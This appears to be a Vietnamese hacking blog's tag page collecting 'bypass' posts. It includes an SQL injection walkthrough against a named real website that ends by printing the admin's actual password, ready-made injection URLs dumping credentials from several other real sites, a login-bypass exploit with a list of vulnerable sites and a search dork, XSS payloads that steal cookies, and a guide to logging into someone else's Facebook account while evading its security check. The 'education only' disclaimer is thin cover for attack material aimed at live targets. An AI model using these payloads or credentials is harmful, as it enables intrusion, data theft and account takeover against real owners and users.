Trang

Hiển thị các bài đăng có nhãn Bypass. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Bypass. Hiển thị tất cả bài đăng

SQL UNHEX --- 403 --- LIMIT.

SQL UNHEX --- 403 --- LIMIT.



Please no modific nothing in this website ..only i share it for education only check what u are in and get out .... THANKS





http://ibms.co/about.php?pid=34 ### is ok ###


http://ibms.co/about.php?pid=34' ### error ##


Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


http://ibms.co/about.php?pid=34+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+30--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+40--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+50--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+60--+- ### is ok ###

WTF i'm drunk ....mmm not ... here the solution ..add ---> ' <---

example: /about.php?pid=34'+order+by+1--+-

http://ibms.co/about.php?pid=34'+order+by+1--+-

start again

http://ibms.co/about.php?pid=34'+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+30--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+29--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+28--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+27--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+26--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+25--+- ### is ok ###

Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45

ok 25 Tables
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

now union+select

http://ibms.co/about.php?pid=34'+union+s...,24,25--+-

D: damn 403 f**k... i not want live in this world anymore...this website is secure D: ......


don't worry here the solution

add ( and )

example: /about.php?pid=34'+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25)--+-


http://ibms.co/about.php?pid=34'+union+(...24,25)--+-


done... now is ok again ..but not show the f**k column vulnerable...

only add ---> - <---

example: /about.php?pid=-34'+union+(select+1,2,3,

http://ibms.co/about.php?pid=-34'+union+...4​,25)--+-


well now show columns 6 and 7

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​+++++++

now

add: unhex(hex(table_name)) +from+information_schema/**/.tables+where+table_schema=database()+LIMIT+0,200--+-

example

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.tables+where+table_schema=database()+limit+0,200)--+- ### ( show "Admin" ) ###

done luck today in the first table ---admin is Admin Meh ok next

change the 0 by LIMIT to 1

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.tables+where+table_schema=database()+limit+1,200)--+- ### ( show "Contact" ) ### ok leave it . already have the name ... is admin u see it before ...

ok now columns

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​+++++++

############# now the columns ############


add: +union+select+1,unhex(hex(column_name)) +from+information_schema/**/.columns+where+table_schema=database()+LIMIT+0,200--+-


example:

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+0,200)--+- ### ( show "Id" ) ###

but we need user and pass.let's go to search it only change +LIMIT+0,200--+- TO +LIMIT+1,200--+-

and +LIMIT+2,200--+- and +LIMIT+3,200--+- etc....



########## this show username or admin user #################

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+1,200)--+- ###( show "Username" )###

done here the username but continue searching for the pass .....change it for 2 and 3 etc ...


########### this show password #################

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+2,200)--+- ###( show "Password" )###

well username and password by admin

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++++++++++++++++++++++
+++++++++++++++++

now dump dates ...

add: unhex(hex(username)) and +from+admin)--+-

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+admin)--+-

###( show "admin" ) = username = admin) ###



now column "password"

example: unhex(hex(password)),3,4,5,6, and +from+admin--+-

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+admin)--+-

###( show "Ibmsanusha" ) = password = Ibmsanusha )###


Done..Enjoy testing others Websites.



REMEMBER

Please no modific nothing in this website ..only i share it for education only check what u are in and get out .... THANKS

Xem Thêm

 

Powered by Cyberjee Bypass Login Page Vulnerability

# Exploit : Login page bypass
#
# Location : [Target]/login.php Location 2 : [Target]/admin
#
# Username : '=' 'or'
#
# Password : '=' 'or'
######################
# Proof:
#
# http://www.dumarsgrill.com/admin/index.php
#
# http://www.tripplesperfumes.com/login.php
#
# http://johnnyswatches.com/admin/
#
# http://www.timefactoryinc.com/admin/admin_panel.php
#
# http://www.blakesbarbq.biz/admin/index.php
#
#
#
# Google Dork : intext:"Powered by Cyberjee Systems, Inc"
######################

Xem Thêm

 

Bypass Symlink Work 100% By Mauritania Attacker Private!


You can Bypass any server with this method you just need to do some little changes in the following file :

* php.ini

* and bypass suEXEC

For example i have this simple "php.ini" 

safe_mode = Off
disable_functions =
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = On


Just add these to "disable_functions ="

"ln, cat, popen, pclose, posix_getpwuid, posix_getgrgid, posix_kill, parse_perms, system, dl, passthru, exec, shell_exec, popen, proc_close, proc_get_status, proc_nice, proc_open, escapeshellcmd, escapeshellarg, show_source, posix_mkfifo, mysql_list_dbs, get_current_user, getmyuid, pconnect, link, symlink, pcntl_exec, ini_alter, pfsockopen, leak, apache_child_terminate, posix_kill, posix_setpgid, posix_setsid, posix_setuid, proc_terminate, syslog, fpassthru, stream_select, socket_select, socket_create, socket_create_listen, socket_create_pair, socket_listen, socket_accept, socket_bind, socket_strerror, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, openlog, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual, chmod, file_upload, delete, deleted, edit, fwrite, cmd, rename, unlink, mkdir, mv, touch, cp, cd, pico"

So our "php.ini" will be like this :

safe_mode = Off
disable_functions = "ln, cat, popen, pclose, posix_getpwuid, posix_getgrgid, posix_kill, parse_perms, system, dl, passthru, exec, shell_exec, popen, proc_close, proc_get_status, proc_nice, proc_open, escapeshellcmd, escapeshellarg, show_source, posix_mkfifo, mysql_list_dbs, get_current_user, getmyuid, pconnect, link, symlink, pcntl_exec, ini_alter, pfsockopen, leak, apache_child_terminate, posix_kill, posix_setpgid, posix_setsid, posix_setuid, proc_terminate, syslog, fpassthru, stream_select, socket_select, socket_create, socket_create_listen, socket_create_pair, socket_listen, socket_accept, socket_bind, socket_strerror, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, openlog, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual, chmod, file_upload, delete, deleted, edit, fwrite, cmd, rename, unlink, mkdir, mv, touch, cp, cd, pico"
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = On

Some examples of screenshots in Whm ;)




553067_10151303602567035_1828598650_n

562177_10151303602677035_853140348_n

63909_10151303602817035_1919120495_n
Note: This Method was tested on Ovh & Bluehost servers and it successfully bypassed them!
Follow: http://www.hackerzadda.com/2013/03/bypass-symlink-100.html

Xem Thêm

 

6 Random Injections

1
Mã:
http://www.elansystems.co.za/product-item.php?product_items_id=-11 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,group_concat(username, ​0x3b,password),5,6,7,8,9,10 from users_tbl--

2/

Mã:
http://www.nbjm-sprayer.com/products.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(username,0x3b,password),18,1 ​9,20,21,22,23 from user_table--

3/

Mã:
http://www.mcdonaldlawoffice.net/story.php?articleid=-8 UNION SELECT 1,2,group_concat(name,0x3b,password),4,5,6,7,8,9,10,11,12,13,14,15,16 from users--

4/

Mã:
http://localtime.biz/product.php?cat_id=-1 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(email,0x3b, ​pwd,0x3c,0x62,0x72,0x3e),4 from users--

5/

Mã:
http://www.eltee.de/kolumnen_id.php?id=-30175 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--

6/

Mã:
http://www.media4world.de/mini_d/list_art.php?shop=-5 UNION SELECT group_concat(username,0x3b,kwort,0x3b,admin,0x3c,0x62,0x72,0x3e) from user--

Xem Thêm

 

Bug Topx Vbb


Xem Thêm

 

Methods to Bypass a Web Application Firewall

Xem Thêm

 

Bypass SQLi VBB ( ALL Version )


Xem Thêm

 

Facebook sửa lỗi bypass Password

Facebook vừa sửa lỗ hổng bảo mật vào cuối tuần qua và cho rằng nó có thể bị khai thác và có thể có trên 1 triệu tài khoản sẽ bị đăng nhập trái phép nếu không xác thực kịp thời


Trong tuần này Facebook đã vô hiệu hóa lỗ hổng mà có thể cho phép các hacker truy cập vào tài khoản người dùng mà không cần mật khẩu.
Các Hacker đã phát hiện ra lỗ hổng này của Facebook và được đăng lên vào thứ 6 vừa qua.
Theo tin tức của các Hacker. Các lỗ hổng được tập trung vào các Email từ mạng xã hội có chưa các liên kết độc hại. Khi người dùng Click vào link đó và các hacker có thể đăng nhập vào tài khoản email mà không cần dùng password hay qua một bước xác thực nào cả. Theo các thông kê tìm kiếm trên google thì có khả năng 1,3 triệu người sử dụng có khả năng dính lỗ hổng này.
Cũng như các liên kết mà có thể phơi bày các tài khoản Facebook để đăng nhập trái phép, truy vấn tìm kiếm cũng cho thấy địa chỉ e-mail liên kết với các tài khoản.Các truy vấn tìm kiếm đã tìm thấy các liên kết – chỉ là tạm thời và sẽ hết hiệu lực khi người dùng dự định nhấp vào chúng – kể từ đó đã bị vô hiệu hóa bởi Google và không hiển thị bất kỳ kết quả nào.
Kỹ sư Matt Jones của Facebook nói trên trang Hacker News  rằng Facebook không chia sẻ các liên kết. “Chúng tôi chỉ gửi các URL đến địa chỉ e-mail của chủ tài khoản để dễ dàng sử dụng và không bao giờ làm cho họ công bố công khai Thậm chí sau đó, chúng tôi đặt bảo vệ tại chỗ để làm giảm khả năng mà bất cứ ai khác có thể nhấp chuột vào các tài khoản.”
“Đối với một công cụ tìm kiếm để đi qua những liên kết này, nội dung của e-mail sẽ cần phải đã được đăng trực tuyến (ví dụ như thông qua các trang web email throwaway, như ai đó chỉ ra – hoặc những người có địa chỉ e-mail đi để gửi email danh sách với trực tuyến lưu trữ), ” ông nói thêm.
Hệ thống bảo mật của Facebook cũng chạy “kiểm tra bổ sung để đảm bảo rằng nó trông giống như chủ sở hữu tài khoản của những người đăng nhập vào”, theo Jones.
Hầu hết các liên kết trong các kết quả tìm kiếm đã có thể đã hết hạn, và Kể từ đó, Facebook đã vô hiệu hóa các tính năng cho thời gian, các kỹ sư cho biết.
“Bất kể, do một số những liên kết này bị tiết lộ, chúng tôi đã bật tính năng cho đến khi chúng tôi tốt hơn có thể bảo đảm an toàn cho người sử dụng e-mail nội dung hiển thị công khai. Chúng tôi cũng đảm bảo tài khoản của bất cứ ai đăng nhập thông qua hệ thống kiểm tra độ an toàn của facebook. “

Xem Thêm

 

[TUT] Bypass Filter + 403 Forbidden SQL Injection



Victim :

check lỗi :
Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
-> Lỗi rồi nhé ! tiếp tục order

Xem Thêm

 

Local bypass ip/~user

Xem Thêm

 

Bypass XSS filters

Đa số các "bộ lọc" sẽ sử dụng cách cơ bản nhất là chặn các thẻ <script></script>.

Chúng ta sẽ cùng xem một số VD sau:

+Sử dụng các thuộc tính của các thẻ html:


<body onload=alert('test1')>
<b onmouseover=alert('Wufff!')>click me!</b>
<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>

+Sử dụng thuộc tính SRC:
<IMG SRC=javascript:alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
Encode nội dung (UTF-8)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

+Sử dụng URI đã được encode base64
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">

Chú ý: một số code có thể không chạy được trên một số trình duyệt.
Đây chỉ là một ít trong số rất nhiều cách thực thi các đoạn mã javascript
Các bạn có thể tham khảo thêm tại: http://ha.ckers.org/xss.html

Xem Thêm

 

Mở băng DeepFreeze bằng tay

Với 1 máy đã được cài DeepFreeze. Nếu ở chế độ mở băng ta có thể thay đổi bình thường, gỡ bỏ chương trình... Với chế độ đóng băng ta không thể làm gì được. Chương trình DeepFreeze khởi động 1 Driver tên DeepFrz để đóng băng, muốn vô hiệu hóa đóng băng ta sẽ phải tiến hành vô hiệu hóa Driver đó từ HĐH khác.

Xem Thêm

 

[TUT] How to Login in Facebook without Getting the Security Question 100% work

You got someone facebook id and password. If you try to login to that account from your your system, it will ask to answer security question. You can bypass this security.

Requirments:
slave IP address

* Go to http://www.ip2location.com
* and enter the IP address.
* It will show the country of slave.
* Now visit:
* http://www.samair.ru/
* Find the proxy IP address based on the slave's Counry.
* Set the proxy IP in mozilla
* Now login to facebook with id you got. you won't get Security
Question now.

Xem Thêm

 

Flood ChangUonDyU Chatbox (Bypass Anti Flood)

Flood này thì nhiều bạn biết rồi, nhưng đó là với server config chatbox:
$config['check_domain_reffer'] = false; // Kiem tra site gui yeu cau
$config['check_chatbox_key'] = false; // Kiem tra tu khoa chat box
 Còn với server config:
$config['check_domain_reffer'] = true; // Kiem tra site gui yeu cau
$config['check_chatbox_key'] = true; // Kiem tra tu khoa chat box
Thì hãy xem clip bên trên và suy nghĩ xem Juno_okyo đã bypass Anti Flood của ChangUonDyU như nào nhé! :D

P/S: chân thành xin lỗi BeYeuGroup vì đã test chatbox mà ko báo trước :D.

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương